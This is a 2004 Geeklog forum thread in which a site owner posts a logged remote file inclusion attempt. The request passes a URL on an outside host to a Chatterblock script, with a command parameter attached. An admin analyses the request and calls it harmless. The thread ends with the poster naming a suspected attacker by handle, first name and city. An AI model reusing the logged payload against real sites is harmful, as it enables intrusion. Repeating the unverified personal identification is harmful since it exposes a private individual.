Welcome to Geeklog, Anonymous Friday, September 20 2024 @ 09:03 pm EDT

Geeklog Forums



Attention I have detected some attack attempts this mornig and it is coming from http://mail.omd.it/ using a cross script

here is the log file - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"

as you can see they tried to use the cmd1.txt if you check the following URL http://mail.omd.it/cmd1.txt you'll see the code which I haven't examined yet


*censored* me, I think the omd has been hacked and the guy redirected the page to my site. if you go to http://omd.it it will go to my site. WTF

Status: offline


Forum User
Registered: 05/05/04
Posts: 5
I have blocked them on my server. but something is going on. I didn't have my chatterblock enabled that is what stoped them from uploading the exploit into my server.


Well spotted! Anyone got geeklog on a test server to check this out?

Status: offline


Site Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
The cmd1.txt contains the C source code for a Linux kernel exploit. So it looks like that if this somehow gets executed, it's trying to compile and run that exploit (probably to get root access on the webserver).

Of course, anybody running a webserver on Linux should have updated their kernel by now (the exploit seems to be old) ...

I'm not sure what the Chatterblock does with that manipulated URL, so it's possible that it's not run at all. In any case, it wouldn't hurt to hide your Chatterblock from anonymous users (go to the Admin's blocks menu and uncheck the "Anonymous R" checkbox for the Chatterblock).

bye, Dirk

Status: offline


Site Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
After a quick look through the source for cb_chatLog.php I have to doubt that anything was or would be executed here. The "show" parameter is used as a numeric value in the Chatterblock, doing some calculations, for example.

So to me, this looks pretty harmless.

We're actually seeing quite a lot of these attempts to stick URLs into parameters. But since Geeklog (and, it seems, the Chatterblock) won't visit those URLs on its own, these "hacking attempts" (if you can even call them that) won't accomplish anything.

bye, Dirk


I found who are these people
his handle is magnific
he's rooted a lot of machines including the one he used to attack me.

his name is rodrigo and I almost have the place where he studies he lives at a city called Sao Jose dos Campos SP he is a brazilian hacker.

All times are EDT. The time is now 09:03 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content